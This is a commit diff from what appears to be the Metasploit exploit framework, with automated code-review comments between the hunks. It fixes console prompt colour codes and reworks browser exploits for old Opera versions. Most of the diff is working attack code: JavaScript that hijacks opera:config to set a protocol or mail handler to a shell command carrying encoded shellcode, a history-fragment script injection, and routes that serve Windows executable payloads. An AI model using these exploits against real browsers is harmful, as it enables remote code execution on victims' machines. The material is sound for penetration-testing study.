fix a bug in colorization where %c gets replaced before %cya; this wouldn't have been a problem until colorization gets put back in
git-svn-id: file:///home/svn/framework3/trunk@6960 4d416f70-5f16-0410-b530-b9f4589650da
parent
dac1251cb7
commit
08d50e0a5b
|
@ -231,6 +231,7 @@ protected
|
|||
raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform.names.join("/")}/#{actual_arch}"
|
||||
else
|
||||
dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
|
||||
print_status("Selected payload #{actual_payload.refname} from generic payload #{refname}")
|
||||
# Share our datastore with the actual payload so that it has the
|
||||
# appropriate values to substitute ad so on.
|
||||
self.actual_payload.share_datastore(self.datastore)
|
||||
|
|
|
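Review bot: The comment added above `self.actual_payload.share_datastore(self.datastore)` has a typo in `# appropriate values to substitute ad so on.`; it should read `# appropriate values to substitute and so on.`. It would also help a later reader to say what "share" means here — whether the payload receives a reference to the same datastore object or a copy — since that decides whether later `set` commands on the exploit reach the payload; I cannot tell from this hunk. The enclosing method starts and ends outside the hunk.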
@ -1442,7 +1442,7 @@ class Core
|
|||
mod.init_ui(driver.input, driver.output)
|
||||
|
||||
# Update the command prompt
|
||||
driver.update_prompt("#{mod.type}(#{mod.shortname}) ")
|
||||
driver.update_prompt("%c%cya#{mod.type}%c(%b%red#{mod.shortname}%c) ")
|
||||
end
|
||||
|
||||
#
|
||||
|
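Review bot: In `driver.update_prompt("%c%cya#{mod.type}%c(%b%red#{mod.shortname}%c) ")` the module type and shortname are interpolated into the format string before the `%`-token substitution runs, so any `%` followed by a token letter inside those names would be rewritten into colour escapes rather than printed. Module names come from the module tree, so this is a robustness rather than a security point, but it is cleaner to substitute the tokens first and append the names afterwards, or to escape `%` in interpolated values. A short comment naming the token vocabulary (`# %c clear, %cya cyan, %b bold, %red red`) on this line would also spare readers a trip to the substitution code. The enclosing method starts outside the hunk.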
@ -1745,7 +1745,7 @@ protected
|
|||
|
||||
def show_options(mod) # :nodoc:
|
||||
mod_opt = Serializer::ReadableText.dump_options(mod, ' ')
|
||||
print("\nModule options:\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
|
||||
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
|
||||
|
||||
# If it's an exploit and a payload is defined, create it and
|
||||
# display the payload's options
|
||||
|
|
|
@ -21,7 +21,7 @@ class Driver < Msf::Ui::Driver
|
|||
ConfigCore = "framework/core"
|
||||
ConfigGroup = "framework/ui/console"
|
||||
|
||||
DefaultPrompt = "%umsf"
|
||||
DefaultPrompt = "%u%whimsf%c"
|
||||
DefaultPromptChar = ">%c"
|
||||
|
||||
#
|
||||
|
|
|
@ -160,12 +160,12 @@ module Shell
|
|||
# Substitute colors
|
||||
new_prompt.gsub!(/%u/, colorize('underline'))
|
||||
new_prompt.gsub!(/%b/, colorize('bold'))
|
||||
new_prompt.gsub!(/%cya/, colorize('cyan'))
|
||||
new_prompt.gsub!(/%c/, colorize('clear'))
|
||||
new_prompt.gsub!(/%red/, colorize('red'))
|
||||
new_prompt.gsub!(/%grn/, colorize('green'))
|
||||
new_prompt.gsub!(/%blu/, colorize('blue'))
|
||||
new_prompt.gsub!(/%yel/, colorize('yellow'))
|
||||
new_prompt.gsub!(/%cya/, colorize('cyan'))
|
||||
new_prompt.gsub!(/%whi/, colorize('white'))
|
||||
new_prompt.gsub!(/%mag/, colorize('magenta'))
|
||||
new_prompt.gsub!(/%blk/, colorize('black'))
|
||||
|
|
|
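Review bot: Moving `%cya` ahead of `%c` fixes one prefix collision but leaves the same bug for `%b`: `new_prompt.gsub!(/%b/, colorize('bold'))` still runs before the `%blu` and `%blk` substitutions, so `%blu` becomes bold followed by a literal `lu` and `%blk` bold followed by `lk`. The minimal fix in the commit's own style is to move the `%b` line below `new_prompt.gsub!(/%blk/, colorize('black'))`. A more robust shape is a single `gsub!` over an alternation listed longest-token-first (`/%(cya|red|grn|blu|yel|whi|mag|blk|u|b|c)/`) with a block that looks the capture up in a token-to-colour hash, which removes the ordering dependency entirely and deserves a comment explaining why order matters. The enclosing method starts and ends outside the hunk.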
@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
#[ 'Opera < 9.10 Windows',
|
||||
# {
|
||||
# 'Platform' => 'win',
|
||||
# 'Arch' => ARCH_X86,
|
||||
# }
|
||||
#],
|
||||
[ 'Opera < 9.10 Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Opera < 9.10 Unix Cmd',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_uri(cli, request)
|
||||
|
||||
case request.uri
|
||||
when /payload$/
|
||||
when /payload/
|
||||
print_status("Generating payload for #{target} #{target.platform}")
|
||||
# Re-generate the payload
|
||||
if ((p = regenerate_payload(cli)) == nil)
|
||||
|
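Review bot: `when /payload/` is unanchored, so the branch now matches any request URI that merely contains the substring "payload" anywhere, not only the `?payload.jpg` resource the later JS requests; the previous `/payload$/` at least pinned it to the end. Since `when get_resource` follows it, a resource path that happens to contain "payload" would be shadowed by this branch. Prefer an explicit pattern such as `when /\?payload\.jpg\z/` (or match on the parsed query) and add a one-line comment stating which client request this branch serves. `on_request_uri` continues past the end of the hunk.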
@ -86,12 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
# NOTE: Change this to the new API when commiting to trunk
|
||||
#content = Msf::Util::EXE.to_win32pe(p.encoded)
|
||||
#content = Rex::Text.to_win32pe(p.encoded)
|
||||
content = "foo"
|
||||
content = Msf::Util::EXE.to_win32pe_vbs(p.encoded)
|
||||
print_status("Generated #{content.length} bytes")
|
||||
headers = { 'Content-Type' => 'application/octet-stream' }
|
||||
#headers = { 'Content-Type' => 'application/octet-stream' }
|
||||
headers = { 'Content-Type' => 'text/html' }
|
||||
when get_resource
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
content = "<body><script>"
|
||||
|
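Review bot: Assuming `content = Msf::Util::EXE.to_win32pe_vbs(p.encoded)` and the `text/html` header are the new side, the hunk still carries commented-out alternatives — `#content = Rex::Text.to_win32pe(p.encoded)` and `#headers = { 'Content-Type' => 'application/octet-stream' }` — that should be deleted rather than kept as dead code now that the API has been chosen. A brief comment on why the VBS variant is served with a `text/html` content type would replace those leftovers with something a maintainer can use. The `case` this belongs to starts outside the hunk.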
@ -113,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
p = regenerate_payload(cli).encoded
|
||||
#print_status(p)
|
||||
shellcode = Rex::Text.to_hex(p, "%")
|
||||
shellcode = Rex::Text.to_hex("foo", "%")
|
||||
js = <<ENDJS
|
||||
blank_iframe = document.createElement('iframe');
|
||||
blank_iframe.src = 'about:blank';
|
||||
|
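Review bot: The hunk prints both `shellcode = Rex::Text.to_hex(p, "%")` and `shellcode = Rex::Text.to_hex("foo", "%")`, and the markers are lost, so I cannot tell which survives. If the `"foo"` literal is the new side, `p = regenerate_payload(cli).encoded` on the first line is computed and then unused and the module ships with a placeholder; if it is the removed side, the `#print_status(p)` debug comment next to it should go as well. Either way the surviving line deserves a comment saying the hex form feeds JavaScript `unescape()`, matching the note the sibling module already carries. The enclosing branch starts outside the hunk.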
@ -121,25 +120,35 @@ blank_iframe.setAttribute('style', 'display:none');
|
|||
document.body.appendChild(blank_iframe);
|
||||
blank_iframe_window.eval(
|
||||
"config_iframe = document.createElement('iframe');" +
|
||||
"config_iframe.setAttribute('id', 'config_iframe_window');" +
|
||||
"config_iframe.src = 'opera:config';" +
|
||||
"document.body.appendChild(config_iframe);" +
|
||||
"cache_iframe = document.createElement('iframe');" +
|
||||
"cache_iframe.src = 'opera:cache';" +
|
||||
"cache_iframe.onload = function ()" +
|
||||
"{" +
|
||||
" config_iframe_window.eval" +
|
||||
" (\\"" +
|
||||
" old_handler = opera.getPreference('Network','TN3270 App');" +
|
||||
" shellcode = '#{shellcode}';" +
|
||||
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
||||
" app_link = document.createElement('a');" +
|
||||
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
||||
" app_link.click();" +
|
||||
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
||||
" \\");" +
|
||||
"};" +
|
||||
"document.body.appendChild(cache_iframe);" +
|
||||
"config_iframe.setAttribute('id', 'config_window');" +
|
||||
"config_iframe.src = 'opera:config';" +
|
||||
"document.body.appendChild(config_iframe);" +
|
||||
"exe_iframe = document.createElement('img');" +
|
||||
"exe_iframe.src = '#{get_resource}?payload.jpg';" +
|
||||
"exe_iframe.onload = function () {" +
|
||||
" cache_iframe = document.createElement('iframe');" +
|
||||
" cache_iframe.src = 'opera:cache';" +
|
||||
" cache_iframe.onload = function ()" +
|
||||
" {" +
|
||||
" config_window.eval" +
|
||||
" (\\"" +
|
||||
" old_handler = opera.getPreference('Network','TN3270 App');" +
|
||||
" shellcode = '#{shellcode}';" +
|
||||
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
||||
" app_link = document.createElement('a');" +
|
||||
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
||||
//" app_link.click();" +
|
||||
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
||||
" \\");" +
|
||||
" };" +
|
||||
" document.body.appendChild(cache_iframe);" +
|
||||
"};" +
|
||||
"exe_iframe.onerror = function (e) {" +
|
||||
" for (var i in e) {" +
|
||||
" alert(i);" +
|
||||
" }" +
|
||||
"};" +
|
||||
"document.body.appendChild(exe_iframe);" +
|
||||
"");
|
||||
ENDJS
|
||||
|
||||
|
|
|
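Review bot: The rewritten `ENDJS` heredoc still contains debugging residue that should not be committed: `//" app_link.click();" +` is a JavaScript line comment placed inside a string-concatenation expression (it only parses because the `+` on the preceding line joins to the following string), and the `exe_iframe.onerror` handler iterates the error object with `alert(i)`. Decide whether the commented line is wanted and either delete it or reinstate it, and drop the alert loop or replace it with a single comment describing the failure case. Two slightly different copies of the same `opera:config` / `TN3270 App` sequence remain in the heredoc; a comment explaining why both are needed would help whoever maintains it. The heredoc is opened outside the hunk.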
@ -70,12 +70,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Targets' =>
|
||||
[
|
||||
#[ 'Automatic', { } ],
|
||||
#[ 'Opera < 9.61 Windows',
|
||||
# {
|
||||
# 'Platform' => 'win',
|
||||
# 'Arch' => ARCH_X86,
|
||||
# }
|
||||
#],
|
||||
[ 'Opera < 9.61 Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Opera < 9.61 Unix Cmd',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
|
@ -104,37 +104,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
^
|
||||
|
||||
case request.uri
|
||||
when /#{get_resource}\.exe/
|
||||
p = regenerate_payload(cli)
|
||||
if (p.nil?)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
content = Msf::Util.to_win32pe(p.encoded)
|
||||
headers['Content-Type'] = 'application/octet-stream'
|
||||
when /[?]jspayload/
|
||||
p = regenerate_payload(cli)
|
||||
if (p.nil?)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
# We're going to run this through unescape(), so make sure
|
||||
# everything is encoded
|
||||
penc = Rex::Text.to_hex(p.encoded, "%")
|
||||
content =
|
||||
%Q{
|
||||
var s = document.createElement("iframe");
|
||||
|
||||
s.src="opera:config";
|
||||
s.id="config_window";
|
||||
document.body.appendChild(s);
|
||||
config_window.eval(
|
||||
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
|
||||
"old_app = opera.getPreference('Mail','External Application');" +
|
||||
"old_handler = opera.getPreference('Mail','Handler');" +
|
||||
"opera.setPreference('Mail','External Application',cmd);" +
|
||||
"opera.setPreference('Mail','Handler','2');" +
|
||||
"app_link = document.createElement('a');" +
|
||||
"app_link.setAttribute('href', 'mailto:a@b.com');" +
|
||||
"app_link.click();" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
|
||||
"");
|
||||
setTimeout(function () {window.location='about:blank'},1);
|
||||
}
|
||||
|
||||
content = generate_cmd(target, p)
|
||||
when /[?]history/
|
||||
js = %Q^
|
||||
window.onload = function() {
|
||||
|
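Review bot: `when /#{get_resource}\.exe/` interpolates the resource path into a regex without `Regexp.escape`, so any metacharacter in the path (the `.` in a path segment, for instance) is interpreted as a pattern rather than matched literally; the safer form is `when /#{Regexp.escape(get_resource)}\.exe/`. The new `content = generate_cmd(target, p)` line replaces the inline JavaScript, and `headers['Content-Type']` in the `.exe` branch relies on `headers` being initialised above the hunk — the enclosing method starts outside it, so I cannot confirm that. A one-line comment on the `jspayload` branch naming what `generate_cmd` returns for each target would make the dispatch readable without opening the helper.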
@ -152,12 +136,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
|
||||
|
||||
js = %Q^
|
||||
var wnd = window;
|
||||
while (wnd.parent != wnd) {
|
||||
wnd = wnd.parent;
|
||||
if (window.opera) {
|
||||
var wnd = window;
|
||||
while (wnd.parent != wnd) {
|
||||
wnd = wnd.parent;
|
||||
}
|
||||
url = location.href;
|
||||
wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
|
||||
}
|
||||
url = location.href;
|
||||
wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
|
||||
^
|
||||
content = %Q^
|
||||
#{html_hdr}
|
||||
|
@ -171,11 +157,69 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
content.gsub!(/^\t{4}/, '')
|
||||
content.gsub!(/\t/, ' ')
|
||||
|
||||
send_response_html(cli, content, headers)
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_cmd(target, payload)
|
||||
if (target.name =~ /Windows/)
|
||||
config_window_js = %Q{
|
||||
var cmd = unescape('cmd.exe /c calc.exe');
|
||||
old_app = opera.getPreference('Mail','External Application');
|
||||
old_handler = opera.getPreference('Mail','Handler');
|
||||
opera.setPreference('Mail','External Application',cmd);
|
||||
opera.setPreference('Mail','Handler','2');
|
||||
app_link = document.createElement('a');
|
||||
app_link.setAttribute('href', 'mailto:a@b.com');
|
||||
app_link.click();
|
||||
setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);
|
||||
setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);
|
||||
}
|
||||
Rex::Text.compress(config_window_js)
|
||||
toplevel_js = %Q{
|
||||
var config_iframe = document.createElement("iframe");
|
||||
config_iframe.src="opera:config";
|
||||
config_iframe.id="config_window";
|
||||
document.body.appendChild(config_iframe);
|
||||
|
||||
chache_iframe = document.createElement("iframe");
|
||||
exe_iframe = document.createElement("script");
|
||||
exe_iframe.src = "#{get_resource + ".exe"}";
|
||||
exe_iframe.onload = function () {
|
||||
config_window.eval("#{config_window_js}");
|
||||
setTimeout(function () {window.location='about:blank'},1);
|
||||
document.body.appendChild(cache_iframe);
|
||||
};
|
||||
document.body.appendChild(exe_iframe);
|
||||
}
|
||||
elsif (target.name =~ /Unix/)
|
||||
# We're going to run this through unescape(), so make sure
|
||||
# everything is encoded, not just chars that are special to html,
|
||||
# ala encode_uri().
|
||||
penc = Rex::Text.to_hex(payload.encoded, "%")
|
||||
content = %Q{
|
||||
var s = document.createElement("iframe");
|
||||
|
||||
s.src="opera:config";
|
||||
s.id="config_window";
|
||||
document.body.appendChild(s);
|
||||
config_window.eval(
|
||||
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
|
||||
"old_app = opera.getPreference('Mail','External Application');" +
|
||||
"old_handler = opera.getPreference('Mail','Handler');" +
|
||||
"opera.setPreference('Mail','External Application',cmd);" +
|
||||
"opera.setPreference('Mail','Handler','2');" +
|
||||
"app_link = document.createElement('a');" +
|
||||
"app_link.setAttribute('href', 'mailto:a@b.com');" +
|
||||
"app_link.click();" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
|
||||
"");
|
||||
setTimeout(function () {window.location='about:blank'},1);
|
||||
}
|
||||
return content
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
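Review bot: In the new `generate_cmd`, the Windows branch never assigns `content`: it builds `toplevel_js` and drops it, so what reaches `return content` depends on the indentation this page lost — either `nil` (which would make the caller's `content.gsub!` raise) or the raw heredoc — and the method's `payload` parameter is unused on that branch, which reads as unfinished test code. `Rex::Text.compress(config_window_js)` discards its return value; if `compress` returns a new string rather than mutating, the newlines stay in `config_window_js` and `config_window.eval("#{config_window_js}")` then embeds a multi-line string inside a JavaScript double-quoted literal. The iframe is created as `chache_iframe` but appended as `cache_iframe`, so the two names never meet. The method also lacks any header comment; a short `# Returns the per-target JavaScript for the jspayload request` plus a note on which branch is complete would help.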